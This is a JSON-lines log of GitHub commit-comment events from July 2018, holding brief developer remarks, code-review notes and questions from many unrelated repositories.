{"id":"7902858221","type":"CommitCommentEvent","actor":{"login":"kaspth"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":29557529,"position":9,"line":9,"path":"activesupport/CHANGELOG.md","commit_id":"969577d960cd7e2d0a421af4a987f56894c3b229","created_at":"2018-07-01T11:11:20Z","updated_at":"2018-07-01T11:11:20Z","author_association":"MEMBER","body":"Great, thanks!"}},"created_at":"2018-07-01T11:11:20Z"}
{"id":"7902858787","type":"CommitCommentEvent","actor":{"login":"calixteman"},"repo":{"name":"mozilla/crashstop"},"payload":{"comment":{"id":29557530,"position":null,"line":null,"path":null,"commit_id":"3f5ea0496d3198e7b10a9f331b08efbf82d86f9b","created_at":"2018-07-01T11:11:48Z","updated_at":"2018-07-01T11:11:48Z","author_association":"COLLABORATOR","body":"Fix issue #29 "}},"created_at":"2018-07-01T11:11:48Z"}
{"id":"7902858934","type":"CommitCommentEvent","actor":{"login":"lightningterror"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":29557531,"position":null,"line":null,"path":null,"commit_id":"1fefb4897e575dae0ffe31dd0e723aa01ea2493b","created_at":"2018-07-01T11:11:57Z","updated_at":"2018-07-01T11:11:57Z","author_association":"MEMBER","body":"Thing is I'm not actually splitting them but rather test a demo - > commit changes then in the future I'll see what else I can test."}},"created_at":"2018-07-01T11:11:57Z"}
{"id":"7902859243","type":"CommitCommentEvent","actor":{"login":"BlackDuck888"},"repo":{"name":"wekan/wekan"},"payload":{"comment":{"id":29557534,"position":null,"line":null,"path":null,"commit_id":"6a587299b80a49fce0789628ff65885b5ed2c837","created_at":"2018-07-01T11:12:11Z","updated_at":"2018-07-01T11:12:11Z","author_association":"NONE","body":"Thanks a lot for setting old style in V1.11 back!"}},"created_at":"2018-07-01T11:12:11Z"}
{"id":"7902859861","type":"CommitCommentEvent","actor":{"login":"Pyroarsonist"},"repo":{"name":"SvineruS/bot_miner"},"payload":{"comment":{"id":29557536,"position":null,"line":null,"path":null,"commit_id":"6f0dac011602842bbbe2d86520af32bf08da7382","created_at":"2018-07-01T11:12:42Z","updated_at":"2018-07-01T11:12:42Z","author_association":"NONE","body":"### **майнер мамин**"}},"created_at":"2018-07-01T11:12:42Z"}
{"id":"7902859935","type":"CommitCommentEvent","actor":{"login":"lowlah"},"repo":{"name":"lowlah/Omolola"},"payload":{"comment":{"id":29557537,"position":null,"line":null,"path":null,"commit_id":"4683fc77e5b649eaf5d99fe36c8da6218c31f0d4","created_at":"2018-07-01T11:12:46Z","updated_at":"2018-07-01T11:12:46Z","author_association":"OWNER","body":"Initially added a class GridText to the <h2> while trying to work on the design. Removed the class and forgot to make changes on the css. "}},"created_at":"2018-07-01T11:12:46Z"}
{"id":"7902860298","type":"CommitCommentEvent","actor":{"login":"Thunder33345"},"repo":{"name":"ArceusMatt/NoProxy"},"payload":{"comment":{"id":29557538,"position":null,"line":null,"path":null,"commit_id":"223034a4f77a273707c4c03985bcd3ec51fbcd7b","created_at":"2018-07-01T11:13:01Z","updated_at":"2018-07-01T11:13:01Z","author_association":"NONE","body":"Dear @ArceusMatt:\nI regret to inform you that the release you submitted, named \"**NoProxy**\" (v1.0.0), for the project [NoProxy](https://poggit.pmmp.io/ci/ArceusMatt/NoProxy/NoProxy) on 2018-07-01T08:04:00.000Z, has been rejected.\n\nUnder PQRS, any web request call MUST be done using async task\nplugin is rejected under the basis that it's core function depends on an API\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-01T11:13:01Z"}
{"id":"7902863213","type":"CommitCommentEvent","actor":{"login":"BGftw97"},"repo":{"name":"BGftw97/hello-world"},"payload":{"comment":{"id":29557542,"position":null,"line":null,"path":null,"commit_id":"6fd43cb8218b58ffa8acd6fa9eee26b6a7ca7d95","created_at":"2018-07-01T11:15:24Z","updated_at":"2018-07-01T11:15:24Z","author_association":"OWNER","body":"awe pishi si q na php nego misli "}},"created_at":"2018-07-01T11:15:24Z"}
{"id":"7902863442","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"mpsujek/blog"},"payload":{"comment":{"id":29557543,"position":11,"line":101,"path":"_config.yml","commit_id":"1fe6beb7e7fabca8b70e73eaab75fd2321acdb8a","created_at":"2018-07-01T11:15:35Z","updated_at":"2018-07-01T11:15:35Z","author_association":"CONTRIBUTOR","body":"Przenieś wyżej (do 94 linijki) i daj 2 spacje wcięcia 👍 "}},"created_at":"2018-07-01T11:15:35Z"}
{"id":"7902865869","type":"CommitCommentEvent","actor":{"login":"ebfe"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29557544,"position":5,"line":7,"path":"srcpkgs/protobuf-c/template","commit_id":"e81fc4745ba3ae04300601ff61997b804298765d","created_at":"2018-07-01T11:17:30Z","updated_at":"2018-07-01T11:17:30Z","author_association":"CONTRIBUTOR","body":"> euh? why not simply use -std=c++17?\n\ndoesn't work, ignore.\n"}},"created_at":"2018-07-01T11:17:30Z"}
{"id":"7902867040","type":"CommitCommentEvent","actor":{"login":"aditya2903"},"repo":{"name":"aditya2903/demo"},"payload":{"comment":{"id":29557545,"position":1,"line":1,"path":"index.html","commit_id":"68175742d6d3f84339750cdc6ffbfcd4ff06c278","created_at":"2018-07-01T11:18:25Z","updated_at":"2018-07-01T11:18:25Z","author_association":"OWNER","body":"dv"}},"created_at":"2018-07-01T11:18:25Z"}
{"id":"7902867195","type":"CommitCommentEvent","actor":{"login":"aditya2903"},"repo":{"name":"aditya2903/demo"},"payload":{"comment":{"id":29557546,"position":1,"line":1,"path":"index.html","commit_id":"68175742d6d3f84339750cdc6ffbfcd4ff06c278","created_at":"2018-07-01T11:18:34Z","updated_at":"2018-07-01T11:18:34Z","author_association":"OWNER","body":"cdvdv"}},"created_at":"2018-07-01T11:18:34Z"}
{"id":"7902867522","type":"CommitCommentEvent","actor":{"login":"aditya2903"},"repo":{"name":"aditya2903/demo"},"payload":{"comment":{"id":29557547,"position":1,"line":1,"path":"index.html","commit_id":"68175742d6d3f84339750cdc6ffbfcd4ff06c278","created_at":"2018-07-01T11:18:50Z","updated_at":"2018-07-01T11:18:50Z","author_association":"OWNER","body":"dfvdfv"}},"created_at":"2018-07-01T11:18:50Z"}
{"id":"7902870116","type":"CommitCommentEvent","actor":{"login":"BGftw97"},"repo":{"name":"BGftw97/hello-world"},"payload":{"comment":{"id":29557549,"position":null,"line":null,"path":null,"commit_id":"77de51906b5ae87d5233d723dc4b64468ddb6b05","created_at":"2018-07-01T11:21:02Z","updated_at":"2018-07-01T11:21:02Z","author_association":"OWNER","body":"kaka taka \r\n"}},"created_at":"2018-07-01T11:21:02Z"}
{"id":"7902870859","type":"CommitCommentEvent","actor":{"login":"samdiazlogan"},"repo":{"name":"samdiazlogan/hello-world"},"payload":{"comment":{"id":29557552,"position":null,"line":null,"path":null,"commit_id":"de913ffa60b839c20e3f68bc6c8ed436fc65c388","created_at":"2018-07-01T11:21:42Z","updated_at":"2018-07-01T11:21:42Z","author_association":"OWNER","body":"nice addition"}},"created_at":"2018-07-01T11:21:42Z"}
{"id":"7902871451","type":"CommitCommentEvent","actor":{"login":"vitalyvkrylov"},"repo":{"name":"igorsuhinin/modx-instagram-latest-posts"},"payload":{"comment":{"id":29557556,"position":null,"line":null,"path":null,"commit_id":"6b926187e3f286a1283d250d1791145cf1d02f6d","created_at":"2018-07-01T11:22:11Z","updated_at":"2018-07-01T11:22:11Z","author_association":"NONE","body":"Добрый день!\r\nБился два дня с вызовом сниппета. \r\nОн не рабочий.\r\nОшибка парсинга по JSON вылетатет.\r\nВидимо он раньше работал.\r\nПришлось самому распарсить страницу (быстро).\r\nМожете поправить сниппет, чтобы не писать свой собственный.\r\nЗаранее спасибо."}},"created_at":"2018-07-01T11:22:11Z"}
{"id":"7902879602","type":"CommitCommentEvent","actor":{"login":"hardwareadictos"},"repo":{"name":"ValidusOs-Devices/device_huawei_berkeley"},"payload":{"comment":{"id":29557591,"position":null,"line":null,"path":null,"commit_id":"a9aab89937f96885b935039c3e3ed6266b674be1","created_at":"2018-07-01T11:28:52Z","updated_at":"2018-07-01T11:28:52Z","author_association":"NONE","body":"Benchmarks are great, I usually run them naked, it gives me about 5-10% more score 🤪🤪"}},"created_at":"2018-07-01T11:28:52Z"}
{"id":"7902880180","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29557596,"position":null,"line":null,"path":null,"commit_id":"2b364271ce2f1d5418402da0d8c5bbd213267423","created_at":"2018-07-01T11:29:20Z","updated_at":"2018-07-01T11:29:20Z","author_association":"COLLABORATOR","body":"Xiaomi.eu-MIUIv10-XML-Compare\r\n\r\nauch keine Leerzeichen"}},"created_at":"2018-07-01T11:29:20Z"}
{"id":"7902882228","type":"CommitCommentEvent","actor":{"login":"amoalys"},"repo":{"name":"amoalys/react"},"payload":{"comment":{"id":29557608,"position":13,"line":13,"path":"README.md","commit_id":"df95b14363c745fdaa06616cadd42fb80c7d164d","created_at":"2018-07-01T11:30:47Z","updated_at":"2018-07-01T11:30:47Z","author_association":"OWNER","body":"react学习效果展示，请查看以下链接\r\nhttp://47.94.107.73/react.html"}},"created_at":"2018-07-01T11:30:47Z"}
{"id":"7902882606","type":"CommitCommentEvent","actor":{"login":"zlsama"},"repo":{"name":"zlsama/deeplearning-"},"payload":{"comment":{"id":29557609,"position":null,"line":null,"path":null,"commit_id":"3a9af67deb8114d34793c67a6e01104958b28df0","created_at":"2018-07-01T11:31:02Z","updated_at":"2018-07-01T11:31:02Z","author_association":"OWNER","body":"tensorflow demo"}},"created_at":"2018-07-01T11:31:02Z"}
{"id":"7902884179","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-react"},"payload":{"comment":{"id":29557627,"position":2,"line":2,"path":"react-complete-guide/src/App.js","commit_id":"8a388c4f939110230121264fdce919100a88047f","created_at":"2018-07-01T11:32:20Z","updated_at":"2018-07-01T11:32:20Z","author_association":"OWNER","body":"Comment to note the changes in this file."}},"created_at":"2018-07-01T11:32:20Z"}
{"id":"7902884302","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29557628,"position":null,"line":null,"path":null,"commit_id":"13838015c8581a0159d6369cabbf489637a8e45b","created_at":"2018-07-01T11:32:27Z","updated_at":"2018-07-01T11:32:27Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[2] Menu finance viditelné pouze pro židli Správce financí](https://trello.com/c/aOgR3U9Y/524-2-menu-finance-viditeln%C3%A9-pouze-pro-%C5%BEidli-spr%C3%A1vce-financ%C3%AD)"}},"created_at":"2018-07-01T11:32:27Z"}
{"id":"7902884547","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29557631,"position":null,"line":null,"path":null,"commit_id":"5bb507fd88a863f4e1abf1b0e786524e5914ea19","created_at":"2018-07-01T11:32:39Z","updated_at":"2018-07-01T11:32:39Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[2] Menu finance viditelné pouze pro židli Správce financí](https://trello.com/c/aOgR3U9Y/524-2-menu-finance-viditeln%C3%A9-pouze-pro-%C5%BEidli-spr%C3%A1vce-financ%C3%AD)"}},"created_at":"2018-07-01T11:32:39Z"}
{"id":"7902884858","type":"CommitCommentEvent","actor":{"login":"brong"},"repo":{"name":"cyrusimap/cyrus-imapd"},"payload":{"comment":{"id":29557635,"position":24,"line":174,"path":"imap/ctl_cyrusdb.c","commit_id":"a867adc23ed59c9e0ced0ffa8bcf3ebf0d557ee7","created_at":"2018-07-01T11:32:52Z","updated_at":"2018-07-01T11:32:52Z","author_association":"CONTRIBUTOR","body":"Is this a legitimate test?\r\n\r\nConsider these mailboxes:\r\n\r\nuser.foo\r\nuser.foo.A\r\nuser.foo.A.B\r\nuser.foo.A.B.C\r\nuser.foo.D\r\n\r\nThere's no need for intermediate mailboxes there, but the \"previous name\" certainly won't be a parent."}},"created_at":"2018-07-01T11:32:52Z"}
{"id":"7902887161","type":"CommitCommentEvent","actor":{"login":"brong"},"repo":{"name":"cyrusimap/cyrus-imapd"},"payload":{"comment":{"id":29557647,"position":24,"line":174,"path":"imap/ctl_cyrusdb.c","commit_id":"a867adc23ed59c9e0ced0ffa8bcf3ebf0d557ee7","created_at":"2018-07-01T11:34:46Z","updated_at":"2018-07-01T11:34:46Z","author_association":"CONTRIBUTOR","body":"A more correct test (I think) is whether the parent is a substring of the last name (possibly the entire thing)  I'll write up an mboxname function for it rather than open coding it here..."}},"created_at":"2018-07-01T11:34:46Z"}
{"id":"7902887164","type":"CommitCommentEvent","actor":{"login":"refractionpcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":29557648,"position":null,"line":null,"path":null,"commit_id":"1fefb4897e575dae0ffe31dd0e723aa01ea2493b","created_at":"2018-07-01T11:34:46Z","updated_at":"2018-07-01T11:34:46Z","author_association":"MEMBER","body":"It probably would be better if you could do them in batches at least. There is a lot of commits which are just a single extra CRC, seems a little silly."}},"created_at":"2018-07-01T11:34:46Z"}
{"id":"7902887175","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29557649,"position":null,"line":null,"path":null,"commit_id":"cf84c7300e0ea5114c765f34869b44e525375fa6","created_at":"2018-07-01T11:34:47Z","updated_at":"2018-07-01T11:34:47Z","author_association":"CONTRIBUTOR","body":"Правильно всё. "}},"created_at":"2018-07-01T11:34:47Z"}
{"id":"7902888909","type":"CommitCommentEvent","actor":{"login":"ronnix"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29557658,"position":19,"line":39,"path":"repondeur/zam_repondeur/views/reponse.py","commit_id":"50a51d12a55474e632453a02df6ff20c3ff73beb","created_at":"2018-07-01T11:36:11Z","updated_at":"2018-07-01T11:36:11Z","author_association":"COLLABORATOR","body":"Ok, got it, thanks!"}},"created_at":"2018-07-01T11:36:11Z"}
{"id":"7902889443","type":"CommitCommentEvent","actor":{"login":"Timerise"},"repo":{"name":"Timerise/First-Data-Science-Project"},"payload":{"comment":{"id":29557661,"position":null,"line":null,"path":null,"commit_id":"613bb5574039e621d454b5ebce56b77f57cfc09f","created_at":"2018-07-01T11:36:38Z","updated_at":"2018-07-01T11:36:38Z","author_association":"OWNER","body":"\r\nupdate"}},"created_at":"2018-07-01T11:36:38Z"}
{"id":"7902890447","type":"CommitCommentEvent","actor":{"login":"Yash-Garg"},"repo":{"name":"Yash-Garg/Assignments"},"payload":{"comment":{"id":29557662,"position":null,"line":null,"path":null,"commit_id":"8ec6a6f5c25f0dabb222d08546be9a184e152403","created_at":"2018-07-01T11:37:30Z","updated_at":"2018-07-01T11:37:30Z","author_association":"OWNER","body":"@nerd-deus That was not working !! So I did this 👍 "}},"created_at":"2018-07-01T11:37:30Z"}
{"id":"7902891203","type":"CommitCommentEvent","actor":{"login":"krzysiek-pwsz"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557667,"position":null,"line":null,"path":null,"commit_id":"ec67aeec3970024805a06e07c2b24e92121332b5","created_at":"2018-07-01T11:38:08Z","updated_at":"2018-07-01T11:38:08Z","author_association":"NONE","body":"Where to get accountid ?\r\nhttps://steamcommunity.com/saliengame/gettoken\r\nreturns only:\r\n\r\n```\r\nwebapi_host | \"https://community.steam-api.com/\"\r\n-- | --\r\nwebapi_host_secure | \"https://community.steam-api.com/\"\r\ntoken | \"XXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\r\nsteamid | \"765611980XXXXXXXX\"\r\npersona_name | \"test_user\"\r\nsuccess | 1\r\n```\r\n\r\n"}},"created_at":"2018-07-01T11:38:08Z"}
{"id":"7902892428","type":"CommitCommentEvent","actor":{"login":"jvanagels"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557675,"position":null,"line":null,"path":null,"commit_id":"ec67aeec3970024805a06e07c2b24e92121332b5","created_at":"2018-07-01T11:39:11Z","updated_at":"2018-07-01T11:39:11Z","author_association":"NONE","body":"Check cheat output. At the beginning \"AccountID\""}},"created_at":"2018-07-01T11:39:11Z"}
{"id":"7902893467","type":"CommitCommentEvent","actor":{"login":"mcasile"},"repo":{"name":"mcasile/myapp"},"payload":{"comment":{"id":29557681,"position":5,"line":10,"path":"test/controllers/static_pages_controller_test.rb","commit_id":"072963430ea41a136273f6da3f52a675cea191a6","created_at":"2018-07-01T11:40:03Z","updated_at":"2018-07-01T11:40:03Z","author_association":"OWNER","body":"Oh this is a mistake!"}},"created_at":"2018-07-01T11:40:03Z"}
{"id":"7902893545","type":"CommitCommentEvent","actor":{"login":"yxiangyang"},"repo":{"name":"yxiangyang/gg"},"payload":{"comment":{"id":29557683,"position":null,"line":null,"path":null,"commit_id":"1bf5c28de84a18298526797ddfe4b9a1df892989","created_at":"2018-07-01T11:40:08Z","updated_at":"2018-07-01T11:40:08Z","author_association":"OWNER","body":"qewqewqe"}},"created_at":"2018-07-01T11:40:08Z"}
{"id":"7902894078","type":"CommitCommentEvent","actor":{"login":"Verazjy"},"repo":{"name":"XJhaoren/Academic-Group"},"payload":{"comment":{"id":29557686,"position":null,"line":null,"path":null,"commit_id":"da1dace0495423f930818d35890904085f4cb6b9","created_at":"2018-07-01T11:40:35Z","updated_at":"2018-07-01T11:40:35Z","author_association":"COLLABORATOR","body":"Pix2PixGAN-CycleGAN-Pix2PixHD\r\nhttps://arxiv.org/pdf/1611.07004.pdf\r\n主讲人：赵晋媛\r\n内容：基于输入条件的GAN改进及处理"}},"created_at":"2018-07-01T11:40:35Z"}
{"id":"7902896029","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29557695,"position":null,"line":null,"path":null,"commit_id":"c64fb62545c635322382d8d9cb63b89d6739c87d","created_at":"2018-07-01T11:42:19Z","updated_at":"2018-07-01T11:42:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180701-114218 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180701-114218\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-01T11:42:19Z"}
{"id":"7902897094","type":"CommitCommentEvent","actor":{"login":"SDMU"},"repo":{"name":"KickVN/SaliensAuto"},"payload":{"comment":{"id":29557697,"position":null,"line":null,"path":null,"commit_id":"a6676b6a608334af66b291d0ea7e437642b089da","created_at":"2018-07-01T11:43:17Z","updated_at":"2018-07-01T11:43:17Z","author_association":"NONE","body":"is it not possible to always deal a high damage value ? "}},"created_at":"2018-07-01T11:43:17Z"}
{"id":"7902898892","type":"CommitCommentEvent","actor":{"login":"Odikanwa"},"repo":{"name":"Odikanwa/Quiz-App"},"payload":{"comment":{"id":29557698,"position":2,"line":2,"path":"README.md","commit_id":"818f607df199a279c0c0dced1409af2ff8649353","created_at":"2018-07-01T11:44:52Z","updated_at":"2018-07-01T11:44:52Z","author_association":"OWNER","body":"It has 10 questions with a total score of 100. Text inputs, check boxes and and radio buttons are all used to extract answers from the user.\r\nLink: https://drive.google.com/open?id=1xLutE_IbchOqpBw6KnJ-GaRBTVQ4hQBG"}},"created_at":"2018-07-01T11:44:52Z"}
{"id":"7902899317","type":"CommitCommentEvent","actor":{"login":"Odikanwa"},"repo":{"name":"Odikanwa/Quiz-App"},"payload":{"comment":{"id":29557701,"position":null,"line":null,"path":null,"commit_id":"818f607df199a279c0c0dced1409af2ff8649353","created_at":"2018-07-01T11:45:12Z","updated_at":"2018-07-01T11:45:12Z","author_association":"OWNER","body":"It has 10 questions with a total score of 100. Text inputs, check boxes and and radio buttons are all used to extract answers from the user.\r\nLink: https://drive.google.com/open?id=1xLutE_IbchOqpBw6KnJ-GaRBTVQ4hQBG"}},"created_at":"2018-07-01T11:45:12Z"}
{"id":"7902899483","type":"CommitCommentEvent","actor":{"login":"nerd-deus"},"repo":{"name":"Yash-Garg/Assignments"},"payload":{"comment":{"id":29557705,"position":null,"line":null,"path":null,"commit_id":"8ec6a6f5c25f0dabb222d08546be9a184e152403","created_at":"2018-07-01T11:45:20Z","updated_at":"2018-07-01T11:45:20Z","author_association":"CONTRIBUTOR","body":"You do realize if a user presses \"Y\" then the program won't ask for pass at all then.\r\nI suggest you do that `goto` thing in the main function only.\r\n@Yash-Garg "}},"created_at":"2018-07-01T11:45:20Z"}
{"id":"7902899645","type":"CommitCommentEvent","actor":{"login":"fdigit"},"repo":{"name":"fdigit/Quize_App001"},"payload":{"comment":{"id":29557706,"position":null,"line":null,"path":null,"commit_id":"f817f669e013b810633ff29e1c4f96616f213490","created_at":"2018-07-01T11:45:27Z","updated_at":"2018-07-01T11:45:27Z","author_association":"OWNER","body":"This App is an android app that was developed using android studio and runs on android devices.  \r\nIt is a quiz app that asks the user questions and allows them to either type in the answer with the keyboard or select from given options. At the end of the quiz, the app adds the correct questions and gives you the score in a toast message. You can get the App on G-Drive via this link  https://drive.google.com/drive/folders/1GZjbqh2igahI0j5HDDOc5hkXtJC4XhZD?usp=sharing\r\n"}},"created_at":"2018-07-01T11:45:27Z"}
{"id":"7902899922","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29557708,"position":null,"line":null,"path":null,"commit_id":"2b364271ce2f1d5418402da0d8c5bbd213267423","created_at":"2018-07-01T11:45:41Z","updated_at":"2018-07-01T11:45:41Z","author_association":"COLLABORATOR","body":"Wann schreibt/spricht doch auch von 3G , 4G und 5G Mobilfunknetzen und nicht von 3 G , 4 G und 5 G Mobilfunknetzen"}},"created_at":"2018-07-01T11:45:41Z"}
{"id":"7902900711","type":"CommitCommentEvent","actor":{"login":"pokeninja66"},"repo":{"name":"BGftw97/hello-world"},"payload":{"comment":{"id":29557710,"position":null,"line":null,"path":null,"commit_id":"77de51906b5ae87d5233d723dc4b64468ddb6b05","created_at":"2018-07-01T11:46:23Z","updated_at":"2018-07-01T11:46:23Z","author_association":"COLLABORATOR","body":"primerno tova raboti za imeto i poruchkata ma ne moga da opravq tova s chislata\r\n$str = '%George%<Croissant>|2|10.3$';\r\necho \"<pre>\";\r\npreg_match('/%(?<name>\\w+)%/', $str, $matches);\r\n$name = $matches['name'];\r\npreg_match('/<(?<order>\\w+)>/', $str, $matches);\r\n$order = $matches['order'];\r\n\r\npreg_match('/[0-9]+|(?<num>)|/', $str, $matches);\r\n$num = $matches['num'];\r\nprint_r($matches);\r\n\r\npreg_match('/[0-9]+|(?<sum>)$/', $str, $matches);\r\n$sum = $matches['sum'];\r\nprint_r($matches);\r\n\r\n\r\necho $name,$order,$num,$sum;"}},"created_at":"2018-07-01T11:46:23Z"}
{"id":"7902904067","type":"CommitCommentEvent","actor":{"login":"KickVN"},"repo":{"name":"KickVN/SaliensAuto"},"payload":{"comment":{"id":29557713,"position":null,"line":null,"path":null,"commit_id":"a6676b6a608334af66b291d0ea7e437642b089da","created_at":"2018-07-01T11:49:10Z","updated_at":"2018-07-01T11:49:10Z","author_association":"OWNER","body":"@SDMU No, it's not possible. I've tried dealing 100-250 damage before and it prevents us from gaining XP. So, it seems steam doesn't give us XP if we deal damage to high."}},"created_at":"2018-07-01T11:49:10Z"}
{"id":"7902905292","type":"CommitCommentEvent","actor":{"login":"stefaniascagliola"},"repo":{"name":"C2DH/ranketwo"},"payload":{"comment":{"id":29557716,"position":null,"line":null,"path":null,"commit_id":"5e04949414ced408c681c6f3403d0a68646c8501","created_at":"2018-07-01T11:50:11Z","updated_at":"2018-07-01T11:50:11Z","author_association":"CONTRIBUTOR","body":"\r\n[12boxes.zip](https://github.com/C2DH/ranketwo/files/2152766/12boxes.zip)\r\n"}},"created_at":"2018-07-01T11:50:11Z"}
{"id":"7902907709","type":"CommitCommentEvent","actor":{"login":"bung87"},"repo":{"name":"Moonshile/ChineseWordSegmentation"},"payload":{"comment":{"id":29557719,"position":null,"line":null,"path":null,"commit_id":"2cd3373da08fcdeb7e0f6b6a009bdfda4dd5c052","created_at":"2018-07-01T11:52:03Z","updated_at":"2018-07-01T11:52:03Z","author_association":"CONTRIBUTOR","body":"this package does not have dependency,so I assuming you use pip to install it\r\nbut this package may not release on pypi,so if you use pip to install it ,it never worked,you can install it via `pip install git+http://...` "}},"created_at":"2018-07-01T11:52:03Z"}
{"id":"7902909244","type":"CommitCommentEvent","actor":{"login":"thrilok333"},"repo":{"name":"thrilok333/MyProjects"},"payload":{"comment":{"id":29557720,"position":null,"line":null,"path":null,"commit_id":"01d7b1a60f99a1677234e6cc2da85fed5e9df69f","created_at":"2018-07-01T11:53:20Z","updated_at":"2018-07-01T11:53:20Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-01T11:53:20Z"}
{"id":"7902912780","type":"CommitCommentEvent","actor":{"login":"MamiyaOtaru"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557724,"position":null,"line":null,"path":null,"commit_id":"b3d597a2005feddcbb526e56ae0591fa2ada0a61","created_at":"2018-07-01T11:56:04Z","updated_at":"2018-07-01T11:56:04Z","author_association":"NONE","body":"had it lock up on me tonight (one instance of four).  Only time it's happened.  Debian on WSL.  One account 3 million behind the rest :(\r\n\r\nhttp://chattypics.com/files/saliensLock_8xo006242t.png\r\n\r\n"}},"created_at":"2018-07-01T11:56:04Z"}
{"id":"7902913019","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29557728,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-01T11:56:15Z","updated_at":"2018-07-01T11:56:15Z","author_association":"OWNER","body":"Checkmarx scan results 01 Jul 2018 14:56 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://2016TEMPLATE/CxWebClient/ViewerMain.aspx?scanid=1000010&projectid=11\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-01T11:56:15Z"}
{"id":"7902913959","type":"CommitCommentEvent","actor":{"login":"Yash-Garg"},"repo":{"name":"Yash-Garg/Assignments"},"payload":{"comment":{"id":29557730,"position":null,"line":null,"path":null,"commit_id":"8ec6a6f5c25f0dabb222d08546be9a184e152403","created_at":"2018-07-01T11:57:04Z","updated_at":"2018-07-01T11:57:04Z","author_association":"OWNER","body":"Okay @nerd-deus 💯 "}},"created_at":"2018-07-01T11:57:04Z"}
{"id":"7902915365","type":"CommitCommentEvent","actor":{"login":"sandy240"},"repo":{"name":"carufus/bbq-samiksha-app"},"payload":{"comment":{"id":29557731,"position":29,"line":285,"path":"app/src/main/java/com/app/bbq/samiksha/ChooseTableActivity.java","commit_id":"251e5c8bcfaac9dba171b45d98b21f70c457f631","created_at":"2018-07-01T11:58:20Z","updated_at":"2018-07-01T11:58:20Z","author_association":"CONTRIBUTOR","body":"Hardcoded index could be difficult to understand, shouldn't we have resource id (R.id)"}},"created_at":"2018-07-01T11:58:20Z"}
{"id":"7902916978","type":"CommitCommentEvent","actor":{"login":"khusika"},"repo":{"name":"kdrag0n/velocity_tissot"},"payload":{"comment":{"id":29557732,"position":null,"line":null,"path":null,"commit_id":"257b6ebb2d4e45ec6c90df574ef2b2db493ee4be","created_at":"2018-07-01T11:59:39Z","updated_at":"2018-07-01T11:59:39Z","author_association":"CONTRIBUTOR","body":"Just a suggestion to cherry-pick the original one then modify with your own changes instead of kang it. Original codes here by @franciscofranco https://github.com/franciscofranco/enchilada/commit/42941ae6c4d1d57664a29d8429b3bee34f1eca20"}},"created_at":"2018-07-01T11:59:39Z"}
